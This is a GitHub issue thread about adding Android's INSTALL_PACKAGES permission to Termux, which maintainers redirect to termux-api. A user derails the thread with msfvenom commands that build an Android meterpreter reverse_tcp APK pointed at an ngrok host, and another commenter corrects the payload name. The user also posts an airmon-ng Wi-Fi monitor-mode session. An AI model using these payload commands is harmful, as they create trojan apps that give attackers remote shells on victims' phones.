### ISSUE TITLE
Add permission android.permission.INSTALL_PACKAGES

### ISSUE THREAD

**Issue by Auxilus** [termux/termux-app#508]
This requires for `pm install <apk_file>`

**Comment by Auxilus** [comment]
u0_a90@localhost /s/e/0/apk> pm install appSaver.apk
        pkg: appSaver.apk
Error: java.lang.SecurityException: Neither user 10090 nor current process has android.permission.INSTALL_PACKAGES.

**Comment by Grimler91** [comment]
Does `pm --user 0 install` works?

**Comment by Auxilus** [comment]
Let me check wait

**Comment by Auxilus** [comment]
u0_a90@localhost /s/e/0/apk> pm --user 0 install appSaver.apk
Error: unknown command '--user'

**Comment by TheComputerGuy96** [comment]
@Grimler91 No:
```
$ pm install --user 0 /sdcard/Br0Zip.apk
Error: java.lang.NullPointerException
$ pm install /sdcard/Br0Zip.apk
Error: java.lang.SecurityException: Permission Denial: runInstallCreate from pm command asks to run as user -1 but is calling from user 0; this requires android.permission.INTERACT_ACROSS_USERS_FULL
$ 
```

**Comment by sm4rk0** [comment]
Are you sure this PR really fits termux-app? Isn't termux-api or something else more appropriate?

**Comment by sm4rk0** [comment]
I believe the idea is to keep termux app as basic as possible, and extend it with termux-api and/or packages.

**Comment by sdrausty** [comment]
Is there a possibility to create something like Termux:Widget that would emulate the kernel mount subsystem? https://github.com/termux/termux-app/issues/376

**Comment by ekant7** [comment]
My phone is not rooted..
But when I use chmod +x ngrok
It shows me an error saying changing permission denied operation not permitted 
Help me guys

**Comment by Auxilus** [comment]
@ekant7 is ngrok located in `/sdcard` ?

**Comment by Grimler91** [comment]
I would also suggest to move this issue/feature request to termux-api. All termux users won't have need for it and having it in (the optional app) termux-api then allows users to get the permission if they need it.

**Comment by ekant7** [comment]
Ngrok is in my internal memory
And I have already installed termux-api

**Comment by Grimler91** [comment]
@ekant7 where in your internal memory? You're probably trying to chmod in /sdcard as Auxilus said which won't work due to Android being Android.

**Comment by Quasic** [comment]
termux can basically only chmod files in the home or usr directories, not shared internal storage, (under /sdcard, or ~/storage, etc.)

As for the original issue, I prefer keeping permissions in termux-api, for the most part.

**Comment by ekant7** [comment]
Oh..
So sir
Can you tell me how can I move it to home directory or usr directory

**Comment by ekant7** [comment]
Sir I solved that problem by your method..now whenever I use Metasploit
It's shows me this error

chmod +x msfvenom
$ ./msfvenom -p /android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io
LPORT=15049 -R > /sdcard/payP.apk
bash: ./msfvenom: /usr/bin/env: bad interpreter: No such file or directory

**Comment by Quasic** [comment]
@ekant7: Sounds like a shebang issue. How did you install metasploit? Using termux-fix-shebang command or the termux-exec package might help... You should probably start a new thread or ask on (gitter)[https://gitter.im/termux/termux] or g+ for better help.

**Comment by ekant7** [comment]
I installed it by
Git clone...
Command from git hub

**Comment by Auxilus** [comment]
@ekant7 please refer https://wiki.termux.com/wiki/Metasploit_Framework

**Comment by ekant7** [comment]
$ msfvenom -p /android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io
LPORT=11814 r >/sdcard/ekuu.apk
Error: Invalid Payload Selected                                  $

**Comment by Auxilus** [comment]
Don't use '/' before 'android/meterpreter/reverse_tcp'

**Comment by ekant7** [comment]
Dear Auxilus
Can I use sudo in non rooted phone
To access rooted tools
If possible..
How can I sir?
Whenever I install sudo
After installation I run command
It says
Sudo requires su

**Comment by Auxilus** [comment]
@ekant7 I guess no, you can't use su or tsu without actually rooting the phone (if you wish to root, and if there is a system app called `Engineering Mode` then it's just a matter of passing 5-6 commands through `adb`)

**Comment by ekant7** [comment]
Well I installed GnuDebian terminal sir
As it gives as a root privilege
And I installed wifite and airmon but using airmon it shows

Sponsored by:

_____                   _
|_   _| ___  ___  ___  _| | _ _  ___  ___
  | |  | -_||  _|| . || . || | ||   || -_|
  |_|  |___||_|  |__,||___||_  ||_|_||___|
                           |___|

root@localhost:/# ls
bin   etc          lib    proc  sdcard   tmp
boot  home         media  root  srv      usr
data  host-rootfs  mnt    run   support  var
dev   intents      opt    sbin  sys      wifite
root@localhost:/# airmon-ng check wlan0
root@localhost:/# python2 wifite
/usr/bin/python2: can't find '__main__' module in 'wifite'
root@localhost:/# python wifite
/usr/bin/python: can't find '__main__' module in 'wifite'
root@localhost:/# airmon-ng

Interface       Chipset         Driver

p2p0            Unknown         wcnss_wlan - [phy0]
wlan0           Unknown         wcnss_wlan - [phy0]

root@localhost:/# airmon-ng check wlan0
root@localhost:/# sudo service network-manager stop
bash: sudo: command not found
root@localhost:/# service network-manager stop
network-manager: unrecognized service
root@localhost:/# service network-manager
network-manager: unrecognized service
root@localhost:/# network-manager
bash: network-manager: command not found
root@localhost:/# ifconfig wlan1 down
wlan1: ERROR while getting interface flags: No such device
root@localhost:/# ifconfig wlan1
wlan1: error fetching interface information: Device not found
root@localhost:/# airmon-ng start [iface]

Interface       Chipset         Driver

p2p0            Unknown         wcnss_wlan - [phy0]
wlan0           Unknown         wcnss_wlan - [phy0]

root@localhost:/#  modprobe ath9k
bash: modprobe: command not found
root@localhost:/# airmon-ng

Interface       Chipset         Driver

p2p0            Unknown         wcnss_wlan - [phy0]
wlan0           Unknown         wcnss_wlan - [phy0]

root@localhost:/# airmon-ng check
root@localhost:/# airmon-ng check kill
root@localhost:/# airmon-ng start wlan0

Interface       Chipset         Driver

p2p0            Unknown         wcnss_wlan - [phy0]
wlan0           Unknown         wcnss_wlan - [phy0]mon0: ERROR while
getting interface flags: No such device

                                (monitor mode enabled on mon0)

root@localhost:/# airmon-ng start wlan0

Interface       Chipset         Driver

p2p0            Unknown         wcnss_wlan - [phy0]
wlan0           Unknown         wcnss_wlan - [phy0]mon0: ERROR while
getting interface flags: No such device

                                (monitor mode enabled on mon0)

root@localhost:/# airmon-ng stop mon1

Interface       Chipset         Driver

p2p0            Unknown         wcnss_wlan - [phy0]
wlan0           Unknown         wcnss_wlan - [phy0]

root@localhost:/# airmon-ng stop mon2

Interface       Chipset         Driver

p2p0            Unknown         wcnss_wlan - [phy0]
wlan0           Unknown         wcnss_wlan - [phy0]

root@localhost:/#

Chipset unknown
Don't know why it is coming

**Comment by ekant7** [comment]
???? Sir

**Comment by Grimler91** [comment]
@ekant7 your questions aren't relevant to this issue. Please ask in the [google+ group](https://plus.google.com/communities/101692629528551299417) or at [gitter](https://gitter.im/termux/termux) instead.

**Comment by fornwall** [comment]
Closing this in favour of adding it to termux-api.

**Comment by ekant7** [comment]
From where I can get aarch 64??

**Comment by Quasic** [comment]
@ekant7, aarch64 refers to physical hardware built into the phone. To get it, you need to buy one of those phones. Do you have problems asking further questions at the places linked above?

**Comment by ekant7** [comment]
No sir
I got all my answers...thank you so much

**Comment by rigortek** [comment]
run : adb root before run pm install -r xxx.apk

**Comment by xeffyr** [comment]
@rigortek Command `adb root` can be used only on debug builds of Android. Specifically, on device should be set the following properties:
```
ro.secure=0
ro.adb.secure=0
ro.debuggable=1
```
